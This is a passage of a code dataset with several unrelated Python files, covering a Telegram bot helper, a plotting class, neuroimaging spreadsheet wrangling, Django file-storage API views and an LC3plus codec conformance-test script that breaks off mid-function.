wait_for_command(self, command, function):\n self.dispatcher.add_handler(CommandHandler(command, function))\n\n def answer_query_with(self, function, pattern=None):\n self.dispatcher.add_handler(CallbackQueryHandler(function, pattern=pattern))\n\n def answer_message_with(self, funcion):\n self.dispatcher.add_handler(MessageHandler(Filters.text & (~Filters.command), funcion))\n\n def answer_inline_mode(self, command, pattern=None):\n self.dispatcher.add_handler(InlineQueryHandler(command, pattern=pattern))\n\n def generate_user_id(self, update):\n try:\n chat_id = update.callback_query.message.chat_id\n except AttributeError:\n try:\n chat_id = update.message.chat_id\n except AttributeError:\n try:\n chat_id = update.inline_query.from_user.id\n except AttributeError:\n chat_id = update.callback_query.from_user.id\n return chat_id\n\n def generate_message_id(self, update):\n try:\n message_id = update.callback_query.message.message_id\n except AttributeError:\n try:\n message_id = update.message.message_id\n except AttributeError:\n try:\n message_id = update.inline_query.from_user.message_id\n except AttributeError:\n message_id = update.callback_query.inline_message_id\n return message_id\n","repo_name":"lucianomartinez27/crypto-alerter","sub_path":"src/bot_telegram/bot_telegram.py","file_name":"bot_telegram.py","file_ext":"py","file_size_in_byte":2492,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"1477144353","text":"import matplotlib.pyplot as plt\nimport numpy as np\nimport seaborn\nimport string\nfrom scipy.optimize import curve_fit\n\n\nclass Plot:\n FIGURE_QUALITY_MAP = {\n 1: dict(figsize=(6, 4), dpi=120),\n 2: dict(figsize=(12, 9), dpi=150),\n 3: dict(figsize=(16, 9), dpi=250),\n }\n\n def __init__(self, parameters={}):\n self.parameters = parameters\n self._setup_style()\n self._setup_figure()\n\n def _setup_style(self):\n seaborn.set()\n plt.rc(\"text\", usetex=True)\n plt.rc(\"font\", family=\"serif\")\n plt.rc(\"xtick\", labelsize=\"x-small\")\n plt.rc(\"ytick\", labelsize=\"x-small\")\n\n def _setup_figure(self):\n figure_parameters = self._get_figure_parameters()\n plt.figure(**figure_parameters)\n\n def _plot_observations(self, X, Y, label, err):\n label_observation = f\"{label} (Observation)\"\n plt.errorbar(X, Y, yerr=err, fmt=\"o\", label=label)\n # plt.scatter(X, Y, label=label)\n\n def _get_fit_label(self, base_label, fit_parameters):\n string_reprs = []\n for index, value in enumerate(fit_parameters):\n letter = string.ascii_lowercase[index]\n value_repr = f\"{value:.5f}\"\n string_reprs.append(f\"{letter}={value_repr}\")\n string_repr = \", \".join(string_reprs)\n label = f\"{base_label} (Fit - {string_repr})\"\n return label\n\n def _plot_fit(self, X, Y, fit_fn, label):\n parameters, _ = curve_fit(fit_fn, X, Y)\n\n label = self._get_fit_label(label, parameters)\n X_fit = np.linspace(min(X), max(X), 100)\n print(parameters)\n print(fit_fn(X_fit, *parameters))\n plt.plot(X_fit, fit_fn(X_fit, *parameters), \"--\", label=label)\n\n def _add_labels(self, xlabel, ylabel):\n plt.xlabel(xlabel)\n plt.ylabel(ylabel)\n\n def _add_legend(self):\n plt.legend()\n\n def _add_title(self, title):\n plt.title(title.format(**self.parameters))\n\n def _save_to_file(self, filename):\n plt.savefig(filename)\n\n def _get_figure_parameters(self):\n if self.figure_quality in self.FIGURE_QUALITY_MAP:\n return self.FIGURE_QUALITY_MAP[self.figure_quality]\n raise ValueError\n\n def plot(self, X, Y, label, fit_fn=None, err=None):\n self._plot_observations(X, Y, label, err)\n if fit_fn:\n self._plot_fit(X, Y, fit_fn, label)\n\n def save(self):\n\n self._add_labels(self.xlabel, self.ylabel)\n self._add_title(self.title)\n self._add_legend()\n self._save_to_file(self.filename)\n","repo_name":"alansammarone/musk","sub_path":"musk/core/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":2566,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7069912552","text":"import pandas as pd\nfrom pathlib import Path\n\n\ndef wrangle_in_files(file, suffix, ubo_subject_ids=False):\n if file.suffix == \".xlsx\":\n df = pd.read_excel(file)\n elif file.suffix == \".tsv\":\n df = pd.read_csv(file, sep=\"\\t\")\n else:\n raise Exception\n\n if ubo_subject_ids:\n df.insert(0, \"session_id\", df.ID.str[9:])\n df.insert(0, \"subject_id\", df.ID.str[:9])\n df.drop(columns=[\"ID\"], inplace=True)\n else:\n df.rename(columns={\"subject\": \"subject_id\", \"session\": \"session_id\"}, inplace=True)\n\n rep = {c: f\"{c}{suffix}\" for c in df.drop(columns=[\"subject_id\", \"session_id\"]).columns}\n df.rename(columns=rep, inplace=True)\n\n df_metadata = pd.DataFrame([], columns=[\"subject_id\", \"session_id\", \"missing\", \"missing_text\"])\n df_metadata[\"subject_id\"] = df[\"subject_id\"]\n df_metadata[\"session_id\"] = df[\"session_id\"]\n df_metadata[\"missing\"] = 0\n\n return df, df_metadata\n\n\nin_dir = Path(\"/Volumes/lhab_public/03_Data/06_DataConversion/01_DataPreparation/10_Neuroimaging/01_wrangling/01_wmh\")\nout_dir = Path(\n \"/Volumes/lhab_public/03_Data/06_DataConversion/01_DataPreparation/10_Neuroimaging/05_ready_2_convert/01_wmh\")\nout_dir.mkdir(exist_ok=True, parents=True)\n\nfile = in_dir / \"WMH_UBO_spreadsheet_2D_fulldata_Tp6.xlsx\"\ndf, df_metadata = wrangle_in_files(file, suffix=\"_ubo2d_orig\", ubo_subject_ids=True)\ndf.to_excel(out_dir / \"lhab_wmh_ubo2d_orig_data.xlsx\", index=False)\ndf_metadata.to_excel(out_dir / \"lhab_wmh_ubo2d_orig_metadata.xlsx\", index=False)\n\nfile = in_dir / \"WMH_UBO_spreadsheet_3D_all_Tp5.xlsx\"\ndf, df_metadata = wrangle_in_files(file, suffix=\"_ubo3d_orig\", ubo_subject_ids=True)\ndf.to_excel(out_dir / \"lhab_wmh_ubo3d_orig_data.xlsx\", index=False)\ndf_metadata.to_excel(out_dir / \"lhab_wmh_ubo3d_orig_metadata.xlsx\", index=False)\n\natlases = [\"JHUlabels\", \"JHUtracts\", \"hoCort\", \"hoSubcort\", \"oxThal\"]\nsuffix_lut = {\"lacunes\": \"_lacunes_parcMNI_{atlas}\", \"wmh\": \"_wmh_ubo2d_parcMNI_{atlas}\"}\n\nfor domain in [\"wmh\", \"lacunes\"]:\n for atlas in atlases:\n file = in_dir / \"MNI/stats\" / domain / f\"{domain}_{atlas}_volume.tsv\"\n suffix = suffix_lut[domain].format(atlas=atlas)\n df, df_metadata = wrangle_in_files(file, suffix=suffix, ubo_subject_ids=False)\n df.to_excel(out_dir / f\"lhab{suffix}_data.xlsx\", index=False)\n df_metadata.to_excel(out_dir / f\"lhab{suffix}_metadata.xlsx\", index=False)\n","repo_name":"dynage/lhab_behav","sub_path":"scripts/prepare_for_phenotype/wrangle_WMH.py","file_name":"wrangle_WMH.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"7066754492","text":"import mimetypes\nimport tempfile\n\nimport requests\nfrom django.shortcuts import render\nfrom drf_yasg import openapi\nfrom drf_yasg.utils import swagger_auto_schema\nfrom fnmatch import fnmatch\nfrom rest_framework import mixins, status, viewsets\nfrom rest_framework.exceptions import NotFound, ParseError\nfrom rest_framework.parsers import MultiPartParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.reverse import reverse\nfrom rest_framework.serializers import ValidationError\nfrom rest_framework.views import APIView, Response\n\nfrom quotas.models import UserQuota\nfrom projects.mixins import allowed_projects_for\nfrom projects.models import Project\nfrom projects.permissions import HasUserAPIKey\nfrom projects.renderers import BinaryFileRenderer\nfrom projects.views import RelatedProjectAPIView\n\nfrom .client import GCSClient\nfrom .serializers import FileSerializer\nfrom .models import File\n\n\nclass StorageAPIView(RelatedProjectAPIView):\n permission_classes = [HasUserAPIKey | IsAuthenticated]\n\n def get_client(self):\n project = self.get_project()\n return GCSClient(project)\n\n\nclass ListFilesView(RelatedProjectAPIView):\n \"\"\"\n View to list all files in the projects container\n \"\"\"\n queryset = File.objects.filter(complete=True)\n permission_classes = [HasUserAPIKey | IsAuthenticated]\n\n @swagger_auto_schema(manual_parameters=[\n openapi.Parameter(\n 'path',\n openapi.IN_QUERY,\n description=\"Path where to list files. Can be a glob pattern\",\n type=openapi.TYPE_STRING)\n ],\n responses={\n 200: FileSerializer(many=True),\n 204: openapi.Response('No files'),\n 400:\n openapi.Response('Invalid project or not found')\n })\n def get(self, request, format=None):\n \"\"\"\n Return a list of all files\n \"\"\"\n # TODO Pagination\n project = self.get_project()\n path = request.query_params.get('path', '*')\n clean_path = path.lstrip(\" /\").rstrip()\n prefix = clean_path.split(\"*\")[0]\n files = self.queryset.filter(project=project, path__startswith=prefix)\n response_status = status.HTTP_204_NO_CONTENT if files.first(\n ) is None else status.HTTP_200_OK\n match_files = (f for f in files if fnmatch(f.path, clean_path))\n return Response(FileSerializer(match_files, many=True).data,\n status=response_status)\n\n\nclass UploadFileView(StorageAPIView):\n \"\"\"\n View for uploading a file\n \"\"\"\n\n parser_classes = [MultiPartParser]\n\n manual_parameters = [\n openapi.Parameter('path',\n openapi.IN_FORM,\n description=\"File output path in storage\",\n type=openapi.TYPE_STRING),\n openapi.Parameter('project',\n openapi.IN_QUERY,\n description=\"Project ID\",\n type=openapi.TYPE_STRING),\n openapi.Parameter('file',\n openapi.IN_FORM,\n description=\"File content\",\n type=openapi.TYPE_FILE)\n ]\n responses = {\n 200: FileSerializer,\n 400: openapi.Response('Bad request'),\n }\n\n @swagger_auto_schema(manual_parameters=manual_parameters,\n responses=responses)\n def post(self, request, format=None):\n path = request.data.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n fileobj = request.data.get('file', None)\n if not fileobj:\n raise ParseError(\"'file' missing\")\n metadata = request.data.get('metadata', {})\n project = self.get_project()\n\n file = File.upload_from_file(\n fileobj, \n path=path, \n project=project, \n metadata=metadata\n )\n\n return Response(dict(detail=FileSerializer(file).data),\n status=status.HTTP_200_OK)\n\n\nclass FileView(StorageAPIView):\n\n queryset = File.objects.filter(complete=True)\n\n @swagger_auto_schema(manual_parameters=[\n openapi.Parameter('path',\n openapi.IN_QUERY,\n description=\"File path.\",\n type=openapi.TYPE_STRING)\n ],\n responses={\n 200: FileSerializer(many=False),\n 404: openapi.Response('File not found'),\n })\n def get(self, request, format=None):\n \"\"\"\n Return the content of a file\n \"\"\"\n project = self.get_project()\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n\n file = self.queryset.filter(path=path, project=project).first()\n if file is None:\n return Response(None, status=status.HTTP_404_NOT_FOUND)\n content = FileSerializer(file).data\n return Response(dict(detail=content), status=status.HTTP_200_OK)\n\n def delete(self, request, format=None):\n \"\"\"\n Delete a file.\n \"\"\"\n project = self.get_project()\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n file = self.queryset.filter(path=path, project=project).first()\n if file is None:\n return Response(None, status=status.HTTP_404_NOT_FOUND)\n file.delete()\n return Response(dict(detail='File deleted.'),\n status=status.HTTP_200_OK)\n\n\nclass DownloadFileView(StorageAPIView):\n renderer_classes = (BinaryFileRenderer, )\n\n def get(self, request):\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n project = self.get_project()\n\n try:\n file = File.objects.get(path=path, project=project)\n except File.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n with tempfile.NamedTemporaryFile() as tmpfile:\n src = tmpfile.name\n file.download_to_filename(src)\n\n content_disp = 'attachment; filename=\"{file_name}\"'.format(\n file_name=path)\n\n with open(src, 'rb') as fileresponse:\n data = fileresponse.read()\n return Response(\n data,\n headers={'Content-Disposition': content_disp},\n content_type=mimetypes.MimeTypes().guess_type(src)[0])\n\n\nclass CreateResumableUploadView(StorageAPIView):\n manual_parameters = [\n openapi.Parameter('path',\n openapi.IN_QUERY,\n description=\"File path in storage\",\n type=openapi.TYPE_STRING),\n openapi.Parameter('size',\n openapi.IN_QUERY,\n description=\"Total file size in bytes (optional)\",\n type=openapi.TYPE_INTEGER),\n ]\n responses = {\n 200: openapi.Response(\"GCS upload session URL\"),\n 400: openapi.Response(\"Bad request\"),\n }\n\n @swagger_auto_schema(manual_parameters=manual_parameters,\n responses=responses)\n def post(self, request):\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n size = request.query_params.get('size', None)\n if not size:\n raise ParseError(\"'size' missing\")\n else:\n size = int(size)\n metadata = request.data.get('metadata', {})\n\n File.check_quota(request.user, size)\n\n client = self.get_client()\n session_url = client.create_resumable_upload_session(\n to=path, size=size, content_type=request.content_type)\n File.objects.update_or_create(project=self.get_project(),\n path=path,\n defaults={\n 'size': size,\n 'complete': False,\n 'metadata': metadata,\n })\n return Response(dict(session_url=session_url),\n status=status.HTTP_200_OK)\n\n\nclass CheckCompletedFileView(StorageAPIView):\n def post(self, request):\n path = request.query_params.get('path', None)\n if not path:\n raise ParseError(\"'path' missing\")\n\n file = File.objects.filter(project=self.get_project(),\n path=path, \n complete=False,\n ).first()\n if not file:\n return Response(None, status=status.HTTP_404_NOT_FOUND)\n\n file.complete = True\n file.save()\n\n content = FileSerializer(file).data\n return Response(dict(detail=content), status=status.HTTP_200_OK)\n","repo_name":"dymaxionlabs/platform","sub_path":"terra/storage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9168,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"41183478416","text":"import argparse\nimport collections\nimport concurrent.futures\nimport configparser\nimport datetime\nimport filecmp\nimport hashlib\nimport io\nimport itertools\nimport logging\nimport math\nimport os\nimport pathlib\nimport re\nimport shlex\nimport shutil\nimport struct\nimport subprocess\nimport sys\nimport uuid\nimport wave\nimport zipfile\ntry:\n import numpy\nexcept ImportError:\n sys.exit('Numpy missing! Try running \"pip3 install numpy\".')\n\n# convenience\nExecutor = concurrent.futures.ThreadPoolExecutor\nTestEnv = collections.namedtuple('TestEnv', 'profile test config test_dir, workers')\nWavInfo = collections.namedtuple('WavInfo', 'ch rate frames')\n\n# constants\nSAMPLERATES = [8000, 16000, 24000, 32000, 44100, 48000]\nFRAME_SIZES = [2.5, 5.0, 10.0]\nSQAM_URL = 'https://tech.ebu.ch/docs/testmaterial/SQAM_FLAC.zip'\nSQAM_SHA256 = '7d6fcd0fc42354637291792534b61bf129612f221f8efef97b62e8942a8686aa'\nSOX_URL = 'https://sourceforge.net/projects/sox/files/sox/14.4.2/sox-14.4.2-win32.zip'\nSOX_SHA256 = '8072cc147cf1a3b3713b8b97d6844bb9389e211ab9e1101e432193fad6ae6662'\nSOX_EXE = pathlib.Path('SoX/sox-14.4.2/sox.exe')\nINF = float('inf')\nREFERENCE_ENCODER = './LC3plus.exe -q -E -formatG192 -frame_ms {frame_size} {options} \"{input}\" \"{output}\" {bitrate}'\nREFERENCE_DECODER = './LC3plus.exe -q -D -formatG192 {options} \"{input}\" \"{output}\"'\n\n# test items\nITEM_DIR = pathlib.Path('test_items')\nITEMS = { # start, frag, SQAM name\n 'ABBA' : ( 7, 8, '69.flac'),\n 'Castanets' : ( 0, 8, '27.flac'),\n 'Eddie_Rabbitt' : ( 0, 8, '70.flac'),\n 'Female_Speech_German': ( 0, 8, '53.flac'),\n 'Glockenspiel' : ( 0, 10, '35.flac'),\n 'Piano_Schubert' : ( 0, 8, '60.flac'),\n 'Violoncello' : ( 0, 10, '10.flac'),\n 'Harpsichord' : (39, 9, '40.flac'),\n 'Male_Speech_English' : ( 0, 8, '50.flac'),\n}\nITEMS_PLC = ['ABBA', 'Castanets', 'Female_Speech_German', 'Harpsichord' , 'Male_Speech_English']\nITEM_LOW_PASS = 'White_Noise_LP20'\nITEM_BAND_LIMIT = 'Female_Speech_German'\n\n# sampling rate, band widths, bytes / frame\nBAND_LIMITS = {\n 48000: ([4000, 8000, 12000, 16000], 115),\n 32000: ([4000, 8000, 12000], 80),\n 24000: ([4000, 8000], 60),\n 16000: ([4000], 40),\n}\nBAND_WIDTHS = {\n 48000: [4000, 8000, 12000, 16000, 20000],\n 32000: [4000, 8000, 12000, 16000],\n 24000: [4000, 8000, 12000],\n 16000: [4000, 8000],\n}\n\n# config default values\nTESTS = [\n 'sqam',\n 'band_limiting',\n 'low_pass',\n 'bitrate_switching',\n 'bandwidth_switching',\n 'plc',\n 'pc',\n 'ep_correctable',\n 'ep_non_correctable',\n 'ep_mode_switching',\n 'ep_combined',\n 'ep_combined_nc',\n]\nTEST_MODES = ['encode', 'encdec', 'decode']\nDEFAULTS_GLOBAL = {\n 'option_bandwidth' : '',\n 'option_ep_debug' : '',\n 'option_ep_mode' : '',\n 'option_plc_mode' : '',\n 'peaq_bin' : '',\n 'peaq_odg_regex' : '',\n 'reference_decoder': REFERENCE_DECODER,\n 'reference_encoder': REFERENCE_ENCODER,\n}\nDEFAULTS_TEST = {'configs': []}\nfor test in TESTS:\n DEFAULTS_TEST['test_' + test] = False\nfor test, mode in itertools.product(TESTS, TEST_MODES):\n DEFAULTS_TEST['{}_{}_eng_threshold'.format(test, mode)] = 70\n DEFAULTS_TEST['{}_{}_mld_threshold'.format(test, mode)] = 4\n DEFAULTS_TEST['{}_{}_odg_threshold'.format(test, mode)] = 0.06\n DEFAULTS_TEST['{}_{}_rms_threshold'.format(test, mode)] = 14\n DEFAULTS_TEST['{}_{}_metric'.format(test, mode)] = 'rms'\nMETRIC_DEFAULTS = {\n 'low_pass_encode_metric' : 'eng',\n 'low_pass_encdec_metric' : 'eng',\n 'plc_decode_metric' : 'mld',\n 'pc_decode_metric' : 'mld',\n 'ep_non_correctable_decode_metric': 'mld',\n 'ep_non_correctable_encdec_metric': 'mld',\n 'ep_combined_nc_decode_metric' : 'mld',\n 'ep_combined_nc_encdec_metric' : 'mld',\n}\nDEFAULTS_TEST.update(METRIC_DEFAULTS)\n\n# html output stuff\nLABEL = {\n 'sqam' : 'SQAM',\n 'band_limiting' : 'Band Limitation',\n 'low_pass' : 'Low Pass',\n 'bitrate_switching' : 'Bitrate Switching',\n 'bandwidth_switching': 'Bandwidth Switching',\n 'plc' : 'Packet Loss Concealment',\n 'pc' : 'Partial Concealment',\n 'ep_correctable' : 'Channel Coder for Correctable Frames',\n 'ep_non_correctable' : 'Channel Coder for Non-Correctable Frames',\n 'ep_mode_switching' : 'Error protection mode switching',\n 'ep_combined' : 'Combined Channel Coder for Correctable Frames',\n 'ep_combined_nc' : 'Combined Channel Coder for Non-Correctable Frames',\n}\nHEADER_ALL = ['Mode', 'Item', 'Frame Size', 'Samplerate', 'Bitrate']\nHEADER_EP = ['EP Mode']\nHEADER_EPD = ['BFI', 'EPMR', 'ER']\nHEADER_BL = ['Bandwidth']\nHEADER_METRIC = {\n 'rms': ['Max. Abs. Diff', 'RMS [dB]', 'RMS Reached [bits]'],\n 'odg': ['ODGref', 'ΔODG'],\n 'mld': ['MLD'],\n 'eng': ['Ediff [dB]'],\n None : []\n}\nHTML_HEAD = ('{title} Report'\n '\\n

    Conformance for \"{title}\" {state}!

    \\n')\nHTML_DIV = '

    {label} - {percent}%

    \\n'\nSTYLE = ('body {font-family:sans-serif; color:#f8f8f2; background-color:#272822; font-size:80%} div {border:1px solid '\n '#8f908a; border-radius:4px; overflow:hidden; display:table; margin-left:30px; margin-bottom:30px} h2 {text-a'\n 'lign:left; margin-left:30px} h3 {text-align:left; margin:4px} table {border-spacing:0px; width:100%} th {pad'\n 'ding:4px; border-top:1px solid #8f908a} td {padding:4px} tr:nth-child(even) {background-color:rgba(255,255,2'\n '55,0.1)} td.pass {background-color:rgba(0,192,255,0.4)} td.fail {background-color:rgba(255,0,0,0.4)} td.warn'\n '{background-color:rgba(214,137,16,0.4)}')\n\n\n# convenience wrapper for os.makedirs\ndef makedirs(path):\n os.makedirs(str(path), exist_ok=True)\n return path\n\n\n# convenience wrapper for shutil.rmtree\ndef removedir(path):\n shutil.rmtree(str(path), ignore_errors=True)\n\n\n# Run command and return output. cmd can be string or list. Commands with .exe suffix are automatically\n# called with wine unless wine=False. Set unicode=False to get binary output. Set hard_fail=False to\n# to ignore nonzero return codes.\ndef call(cmd, wine=True, unicode=True, hard_fail=True, log_output=True):\n if isinstance(cmd, str):\n cmd = [x for x in shlex.split(cmd) if x]\n if sys.platform != 'cygwin' and wine and cmd[0].lower().endswith('.exe'):\n cmd = ['wine'] + cmd\n p = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=unicode)\n out = p.communicate()[0] or (b'', '')[unicode]\n quoted_cmd = ' '.join(map(shlex.quote, cmd))\n logging.debug(quoted_cmd)\n if unicode and log_output:\n logging.debug(out)\n if hard_fail and p.returncode != 0:\n raise OSError(quoted_cmd + ' failed!')\n return out\n\n\n# return url as as bytes object, validate against hash\ndef download(url, sha256=None):\n try:\n buf = call('curl --silent -L \"{}\"'.format(url), unicode=False)\n except OSError:\n sys.exit('Failed to download {}!'.format(url))\n if sha256 and hashlib.sha256(buf).hexdigest() != sha256:\n sys.exit('Failed to validate hash for {}!'.format(url))\n return buf\n\n\ndef download_sox():\n if not is_file(SOX_EXE):\n print('Downloading SoX ...')\n buf = download(SOX_URL, SOX_SHA256)\n zipfile.ZipFile(io.BytesIO(buf)).extractall(str(SOX_EXE.parent.parent))\n if sys.platform == 'cygwin':\n call('chmod -R +x \"{}\"'.format(SOX_EXE.parent))\n\n\ndef exe_exists(exe, wine=False):\n try:\n out = call(exe, wine=wine, hard_fail=False)\n except OSError:\n return False\n return not (wine and out.startswith('wine: ')) # detect wine: cannot find\n\n\ndef check_system(args, globvars):\n if sys.platform == 'win32':\n sys.exit('This script must run under cygwin')\n tools = ['curl', 'gcc', 'make']\n if sys.platform != 'cygwin':\n tools += ['wine']\n if args.system_sox:\n tools += ['sox']\n for tool in tools:\n if not exe_exists(tool):\n sys.exit('Failed to find {} executable'.format(tool))\n if globvars['peaq_bin'] and not exe_exists(globvars['peaq_bin'], wine=True):\n sys.exit('Failed to find PEAQ executable. Please adjust config file')\n if not exe_exists(globvars['encoder'], wine=True):\n sys.exit('Failed to find LC3 encoder executable. Please adjust config file.')\n if not exe_exists(globvars['decoder'], wine=True):\n sys.exit('Failed to find LC3 decoder executable. Please adjust config file.')\n\n\n# search s for expr and return first match or exit\ndef regex_search(expr, s):\n if not re.search(expr, s):\n sys.exit('No match for regular expression \"{}\"!'.format(expr))\n return re.search(expr, s).group(1)\n\n\n# calculates the max xcorr of the two vectors within the length of the longer one\ndef align_vec(x1, x2):\n # trims longer vector at position of max xcorr and returns both\n assert len(x1) >= len(x2)\n res = []\n d = len(x1) - len(x2)\n # normalize to max of int16\n a = numpy.float32(x1) / 32767\n b = numpy.float32(x2) / 32767\n # a is longer than b\n for i in range(d + 1):\n xx = numpy.dot(a[i:len(b) + i], b)\n res.append(xx)\n lag = numpy.array(res).argmax()\n # trim longer vector\n x1 = x1[lag:lag + len(x2)]\n return x1, x2\n\n\n# convert byte objects to signed int16\ndef byte_to_float(b, frames, channels):\n return struct.unpack(\"%ih\" % (frames * channels), b)\n\n\n# trim longer file to length of shorter file at max xcorr position and overwrite longer one\ndef align_files(file_1, file_2):\n logging.debug('align_files: %s %s', file_1, file_2)\n file_1, file_2 = str(file_1), str(file_2)\n # read in audio files and to max of int16\n if wav_info(file_1).frames < wav_info(file_2).frames:\n file_1, file_2 = file_2, file_1\n with wave.open(file_1, 'rb') as wf1, wave.open(file_2, 'rb') as wf2:\n b1 = wf1.readframes(wf1.getnframes())\n b2 = wf2.readframes(wf2.getnframes())\n x1 = byte_to_float(b1, wf1.getnframes(), wf1.getnchannels())\n x2 = byte_to_float(b2, wf2.getnframes(), wf2.getnchannels())\n par1 = wf1.getparams()\n par2 = wf2.getparams()\n # measure cross correlation -> delay between files and return trimmed vectors\n y1, y2 = align_vec(x1, x2)\n # overwrite files\n with wave.open(file_1, 'wb') as wf1, wave.open(file_2, 'wb') as wf2:\n wf1.setparams(par1)\n wf2.setparams(par2)\n wf1.setnframes(len(y1))\n wf2.setnframes(len(y2))\n b1 = struct.pack(\"%ih\" % len(y1), *y1)\n b2 = struct.pack(\"%ih\" % len(y2), *y2)\n wf1.writeframes(b1)\n wf2.writeframes(b2)\n\n\ndef build_tools():\n call('make -C tools')\n\n\n# return info about wav file\ndef wav_info(path):\n wav = wave.open(str(path))\n return WavInfo(wav.getnchannels(), wav.getframerate(), wav.getnframes())\n\n\n# call sox with args in repeatable mode, lazy skips execution if output already exists\ndef sox(*args, lazy=False):\n wavs = [x for x in map(str, args) if x.endswith('.wav')]\n if not (lazy and is_file(wavs[-1])): # last .wav is assumed to be output\n call('{} -R {}'.format(SOX_EXE, ' '.join(map(str, args))))\n\n\ndef trim(input, output, start, end, lazy=False):\n if not (lazy and is_file(output)):\n tmp = output.parent / uuid_file('trim_', '.wav')\n sox(input, tmp, 'trim', start, end)\n wi = wav_info(tmp)\n sox(tmp, output, 'fade', 0.5, wi.frames / wi.rate, 0.7)\n tmp.unlink()\n\n\n# resample wav using sox\ndef resample(input, output, rate, lazy=False):\n sox(input, output, 'rate -vs', rate, lazy=lazy)\n\n\n# apply lowpass filter using sox\ndef low_pass(input, output, fc, lazy=False):\n sox(input, output, 'sinc -{}'.format(fc), lazy=lazy)\n\n\n# generate switching file with unique name, returns path\ndef generate_switching_file(env, *values):\n path = env.test_dir / uuid_file('swf_', '.dat')\n layers = ','.join(map(str, sorted(values)))\n cmd = 'tools/gen-rate-profile.exe -layers {} {}'\n call(cmd.format(layers, path), log_output=False)\n return path\n\n\n# compares binary equality of files\ndef compare_bin(file1, file2):\n logging.debug('compare_bin: %s %s', file1, file2)\n return filecmp.cmp(str(file1), str(file2))\n\n\n# copy file from src to dst\ndef copy_file(src, dst):\n logging.debug('copy_file: %s %s', src, dst)\n shutil.copy(str(src), str(dst))\n\n\n# generate unique file name with extension\ndef uuid_file(prefix='', suffix=''):\n return prefix + str(uuid.uuid4()) + suffix\n\n\n# like str() but with special case for float\ndef fstr(x):\n return '{:.3g}'.format(x) if type(x) == float else str(x)\n\n\n# like str() but with special case for list\ndef lstr(x):\n return '-'.join(map(str, x)) if type(x) in (list, tuple) else str(x)\n\n\n# returns true if path is a file\ndef is_file(path):\n return os.path.isfile(str(path))\n\n\n# calculate bitrate from bytes per frame\ndef get_bitrate(bytes_per_frame, frame_size):\n return int(bytes_per_frame * 8000 / frame_size)\n\n\n# apply func to list of argumets,\ndef thread_executor(func, args, workers):\n list(ThreadPoolExecutor(workers).map(lambda x: func(*x), args)) # list() to collect futures\n\n\ndef prepare_items(workers):\n sqam_dir = pathlib.Path('SQAM')\n item_dir = makedirs(ITEM_DIR)\n if not sqam_dir.exists():\n print('Downloading test items ...')\n buf = download(SQAM_URL, SQAM_SHA256)\n zipfile.ZipFile(io.BytesIO(buf)).extractall(str(sqam_dir))\n\n print('Preparing test items ...')\n # trim items\n with Executor(workers) as ex:\n for item, (st, fr, flac) in ITEMS.items():\n infile = sqam_dir / flac\n outfile = item_dir / (item + '.wav')\n ex.submit(trim, infile, outfile, st, fr, lazy=True)\n # resample items\n with Executor(workers) as ex:\n for item, sr in itertools.product(ITEMS, SAMPLERATES):\n infile = item_dir / (item + '.wav')\n outfile = item_dir / '{}_{}_2ch.wav'.format(item, sr)\n ex.submit(resample, infile, outfile, sr, lazy=True)\n with Executor(workers) as ex:\n # 20 kHz lowpass\n for item, sr in itertools.product(ITEMS, SAMPLERATES):\n if sr >= 44100:\n infile = item_dir / '{}_{}_2ch.wav'.format(item, sr)\n outfile = item_dir / '{}_{}_2ch_lp20.wav'.format(item, sr)\n ex.submit(low_pass, infile, outfile, 20000, lazy=True)\n # band limit\n for sr, (bws, _) in BAND_LIMITS.items():\n for bw in bws:\n infile = item_dir / '{}_{}_2ch.wav'.format(ITEM_BAND_LIMIT, sr)\n outfile = item_dir / '{}_{}_2ch_bw{}.wav'.format(ITEM_BAND_LIMIT, sr, bw)\n ex.submit(low_pass, infile, outfile, bw, lazy=True)\n # LP20 item with 4 seconds of white noise above 20kHz\n outfile = item_dir / (ITEM_LOW_PASS + '_48000_1ch.wav')\n synth = 'synth 4 white fir etc/hp_fir_coef.txt'\n ex.submit(sox, '-n -r 48000 -c 1 -b 16', outfile, synth, lazy=True)\n # create 1ch items\n with Executor(workers) as ex:\n for path in os.listdir(str(item_dir)):\n if '_2ch' in path:\n infile = item_dir / path\n outfile = item_dir / path.replace('_2ch', '_1ch')\n ex.submit(sox, infile, outfile, 'remix -', lazy=True)\n\n\ndef parse_config(path):\n def strip_comment(line):\n return line.split('#', 1)[0].strip()\n\n def split_list(line):\n return [x.strip() for x in strip_comment(line).split(',')]\n\n def parse_conf_line(line):\n mode, fs, sr, br = split_list(line)\n fs, sr = float(fs), int(sr)\n if ':' in br:\n br_start, br_step, br_stop = map(int, br.split(':'))\n br = list(range(br_start, br_stop + 1, br_step))\n else:\n br = [int(br)]\n if fs not in FRAME_SIZES:\n sys.exit('Unsupported frame size: {}!'.format(line))\n if sr not in SAMPLERATES:\n sys.exit('Unsupported sampling rate: {}!'.format(line))\n if min(br) < 16000 or max(br) > 320000:\n sys.exit('Invalid bitrate: {}!'.format(line))\n return mode, fs, sr, br\n\n def parse_bool(val):\n if val not in ('0', '1'):\n raise ValueError\n return val == '1'\n\n if not is_file(path):\n sys.exit('No such file: ' + path)\n\n globals_required = ['enabled_tests', 'encoder', 'decoder']\n globals_all = list(DEFAULTS_GLOBAL) + globals_required\n test_keys = ['test_' + t for t in TESTS]\n globels = DEFAULTS_GLOBAL.copy()\n configs = {}\n\n try:\n parser = configparser.ConfigParser()\n parser.read(path)\n # parse global section\n for key in parser['globals']:\n globels[key] = strip_comment(parser['globals'][key])\n if key not in globals_all:\n 